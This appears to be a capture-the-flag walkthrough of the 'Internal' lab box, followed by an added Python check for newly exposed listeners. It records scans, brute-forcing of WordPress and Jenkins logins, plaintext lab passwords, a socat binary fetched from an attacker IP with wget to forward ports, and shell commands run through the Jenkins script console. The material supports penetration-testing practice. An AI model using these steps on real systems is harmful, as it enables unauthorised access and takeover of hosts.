THM - Internal
Summary
Config
sudo vim /etc/hosts
10.10.102.246 internal.thm
System info
- Apache/2.4.29 (Ubuntu)
- Linux version 4.15.0-112-generic
- Distributor ID: Ubuntu
- Description: Ubuntu 18.04.4 LTS
- Release: 18.04
- Codename: bionic
System User - aubreanna
USER: aubreanna PASSWORD: bubbxxxxxxx123
System User - root
USER: root PASSWORD: tr0xxxxxx123
WordPress
- VERSION: 5.4.2
- USER: admin
- PASSWORD: my2boys
Phpmyadmin
- VERSION: 4.6.6deb5
- URL: http://internal.thm/phpmyadmin/index.php
- USER: wordpress
- PASS: wordpress123
Jenkins
USER: admin PASSWORD: sxxxxxx
Configuration
cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 internal
nmap
nmap -sC -sV -p- internal.thm
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
gobuster dir
gobuster dir --url http://internal.thm/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir --url http://internal.thm/blog/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 20
gobuster dir --url http://internal.thm/phpmyadmin/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 20
- http://internal.thm/ (Apache2 Ubuntu Default Page)
- http://internal.thm/blog/ (WordPress)
- http://internal.thm/blog/wp-admin
- http://internal.thm/blog/wp-content
- http://internal.thm/blog/wp-includes
- http://internal.thm/blog/index.php/wp-json/wp/v2/users
- http://internal.thm/blog/index.php/wp-json/wp/v2/users/1
- http://internal.thm/javascript/ - 403
- http://internal.thm/javascript/prototype/ - 403
- http://internal.thm/javascript/scriptaculous/ - 403
- http://internal.thm/javascript/jquery/ - 403
- http://internal.thm/phpmyadmin/ - (phpmyadmin) (4.6.6deb5)
- http://internal.thm/phpmyadmin/templates - 403
- http://internal.thm/phpmyadmin/themes/ - 403
- http://internal.thm/phpmyadmin/libraries/ - 403
- http://internal.thm/phpmyadmin/setup/ - 401
- http://internal.thm/phpmyadmin/sql/ - 403
- http://internal.thm/phpmyadmin/js/ - 403
- http://internal.thm/phpmyadmin/locale/ - 403
- http://internal.thm/server-status/ - 403
gobuster vhost
gobuster vhost -u http://internal.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
- gc._msdcs.internal.thm
- _domainkey.internal.thm
- mailing._domainkey.sunnynews.internal.thm
- mailing._domainkey.info.internal.thm
- hallam_dev.internal.thm
- hallam_ad.internal.thm
- wm_j_b__ruffin.internal.thm
- 2609_n_www.internal.thm
- 0907_n_hn.m.internal.thm
- 0507_n_hn.internal.thm
- faitspare_mbp.cit.internal.thm
- sb_0601388345bc6cd8.internal.thm
- sb_0601388345bc450b.internal.thm
- api_portal_dev.internal.thm
- api_web_dev.internal.thm
- api_webi_dev.internal.thm
- sklep_test.internal.thm
feroxbuster
feroxbuster --url http://internal.thm -s 200 -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
200 GET 375l 964w 10918c http://internal.thm/
200 GET 328l 3640w 0c http://internal.thm/blog/
200 GET 0l 0w 0c http://internal.thm/blog/wp-content/
200 GET 0l 0w 0c http://internal.thm/blog/wp-content/plugins/
200 GET 26l 359w 0c http://internal.thm/phpmyadmin/
- http://internal.thm
- http://internal.thm/
- http://internal.thm/icons/
- http://internal.thm/blog/
- http://internal.thm/icons/small/
- http://internal.thm/javascript/
- http://internal.thm/blog/wp-content/
- http://internal.thm/blog/wp-includes/
- http://internal.thm/blog/wp-includes/images/
- http://internal.thm/blog/wp-includes/assets/
- http://internal.thm/blog/wp-includes/css/
- http://internal.thm/blog/wp-includes/js/
- http://internal.thm/blog/wp-includes/blocks/
- http://internal.thm/blog/wp-includes/widgets/
- http://internal.thm/blog/wp-content/plugins/
- http://internal.thm/blog/wp-includes/fonts/
- http://internal.thm/blog/wp-includes/customize/
- http://internal.thm/phpmyadmin/
- http://internal.thm/phpmyadmin/sql/
wpscan
Scan for password
wpscan --url http://internal.thm/blog --passwords /usr/share/wordlists/rockyou.txt --proxy http://localhost:8080
- Username: admin
- Password: xxxxxx
Scan for info
wpscan --url http://internal.thm/blog --api-token=.....
- [+] Headers Server: Apache/2.4.29 (Ubuntu)
- [+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
- [+] WordPress readme found: http://internal.thm/blog/readme.html
- [+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
- [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
- [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
- [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
- [!] Title: WordPress 5.4 to 5.8 - Lodash Library Update
- [!] Title: WordPress 5.4 to 5.8 - Authenticated XSS in Block Editor
- [!] Title: WordPress 5.4 to 5.8 - Data Exposure via REST API
- [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
- [!] Title: WordPress < 5.8 - Plugin Confusion
- [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
- [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
- [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
- [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites
- [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
- [+] WordPress theme in use: twentyseventeen
linpeas.sh scan as www-data user
www-data@internal:/tmp$ ./linpeas.sh
Basic information
- OS: Linux version 4.15.0-112-generic
- User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
- Hostname: internal
- Writable folder: /dev/shm
- Distributor ID: Ubuntu
- Description: Ubuntu 18.04.4 LTS
- Release: 18.04
- Codename: bionic
- Sudo version 1.8.21p2
- PATH: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
- New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
Container related tools present
- /usr/bin/docker
- /usr/bin/lxc
- /usr/sbin/runc
Processes, Crons, Timers, Services and Sockets
...
aubrean+ 1452 0.0 0.0 1148 4 ? Ss 12:15 0:00 _ /sbin/tini -- /usr/local/bin/jenkins.sh
aubrean+ 1494 0.4 12.3 2587808 251972 ? Sl 12:15 0:24 _ java -Duser.home=/var/jenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -jar /usr/share/jenkins/jenkins.war
root 1419 0.0 0.1 404800 3464 ? Sl 12:15 0:00 _ /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8080 -container-ip 172.17.0.2 -container-port 8080
...
Hostname, hosts and DNS
internal
127.0.0.1 localhost
127.0.1.1 internal
Active Ports
(netstat -punta || ss --ntpu)
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:39091 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Users Information
uid=33(www-data) gid=33(www-data) groups=33(www-data)
All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(aubreanna) gid=1000(aubreanna) groups=1000(aubreanna),4(adm),24(cdrom),30(dip),46(plugdev)
uid=111(mysql) gid=114(mysql) groups=114(mysql)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Useful software
- /usr/bin/base64
- /usr/bin/ctr
- /usr/bin/curl
- /usr/bin/docker
- /usr/bin/lxc
- /bin/nc
- /bin/netcat
- /usr/bin/perl
- /usr/bin/php
- /bin/ping
- /usr/bin/python
- /usr/bin/python2
- /usr/bin/python2.7
- /usr/bin/python3
- /usr/bin/python3.6
- /usr/sbin/runc
- /usr/bin/sudo
- /usr/bin/wget
Installed Compilers
- /snap/core/8268/usr/share/gcc-5
- /snap/core/9665/usr/share/gcc-5
- /usr/share/gcc-8
Analyzing Wordpress Files (limit 70)
- -rw-r--r-- 1 root root 3109 Aug 3 2020 /var/www/html/wordpress/wp-config.php
- define( 'DB_NAME', 'wordpress' );
- define( 'DB_USER', 'wordpress' );
- define( 'DB_PASSWORD', 'wordxxxxxx' );
- define( 'DB_HOST', 'localhost' );
hosts.allow
/etc/hosts.allow
Message in txt file
cat /opt/wp-save.txt
Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb1xxxxxx
Access to internal resources
Dump configuration
netstat -tulpn | grep LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:45619 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Use socat for port forwarding
Template
socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> &
Source of socat binary (hacker machine)
git clone https://github.com/andrew-d/static-binaries
cd static-binaries/binaries/linux/x86_64
python3 -m http.server
Get socat and run (target machine)
wget 10.18.9.175:8000/socat
chmod +x socat
./socat TCP-LISTEN:8081,fork TCP:0.0.0.0:8080 &
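Defender-side check, added here and not part of the original notes: Jenkins was reachable only through docker-proxy on 127.0.0.1:8080 until the socat forward opened a wildcard listener on 8081. The script parses `netstat -tulpn` style output and reports ports that are exposed now but were loopback-only or absent in a baseline snapshot. The baseline lines are taken from the netstat dump above; the 8081 line and its PID/program column are constructed.

```python
"""Flag listeners that newly expose a loopback-only service (added example)."""
import re

# Columns of `netstat -tulpn`: Proto Recv-Q Send-Q Local Foreign State PID/Program
_LISTEN_RE = re.compile(r"^(tcp6?|udp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN\b")

# Constructed from the notes' netstat dump (the '*' restored); socat not yet running.
BASELINE = """\
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:45619 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
"""
# Constructed: same host after `socat TCP-LISTEN:8081,fork ...` (PID is made up).
CURRENT = BASELINE + "tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN 2231/./socat\n"


def parse_listeners(text):
    """Return {(proto, port): bind_address} for every LISTEN line; tcp6 folds into tcp."""
    listeners = {}
    for line in text.splitlines():
        m = _LISTEN_RE.match(line.strip())
        if m:
            proto, addr, port = m.groups()
            listeners[(proto.rstrip("6"), int(port))] = addr
    return listeners


def is_exposed(addr):
    """True when the bind address accepts connections from other hosts.
    127.0.0.0/8 (including systemd-resolved's 127.0.0.53) and ::1 are loopback."""
    return not (addr.startswith("127.") or addr == "::1")


def new_exposures(baseline_text, current_text):
    """Ports exposed in `current_text` that were loopback-only or missing in the baseline."""
    before = parse_listeners(baseline_text)
    after = parse_listeners(current_text)
    return sorted(port for (proto, port), addr in after.items()
                  if is_exposed(addr)
                  and not is_exposed(before.get((proto, port), "127.0.0.1")))


if __name__ == "__main__":
    for port in new_exposures(BASELINE, CURRENT):
        print(f"new externally reachable listener on port {port}")  # prints 8081
```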
New target jenkins
URL
http://internal.thm:8081/
Scan for version
use auxiliary/scanner/http/jenkins_enum
setg RHOSTS internal.thm
setg RPORT 8081
setg TARGETURI /
show options
run
[+] 10.10.140.111:8081 - Jenkins Version 2.250
Scan for password
use auxiliary/scanner/http/jenkins_login
setg RHOSTS internal.thm
setg RPORT 8081
setg PASS_FILE /usr/share/wordlists/rockyou.txt
setg USERNAME admin
setg STOP_ON_SUCCESS true
show options
[+] 10.10.158.66:8081 - Login Successful: admin:spongebob
Use Jenkins script console
- http://internal.thm:8081/script
println 'whoami'.execute().text
println 'ls -la /'.execute().text
println 'ls -la /home'.execute().text
println 'ls -la /root'.execute().text
println 'ls -la /opt'.execute().text
println 'cat /opt/note.txt'.execute().text
root:tr0ub1xxxxx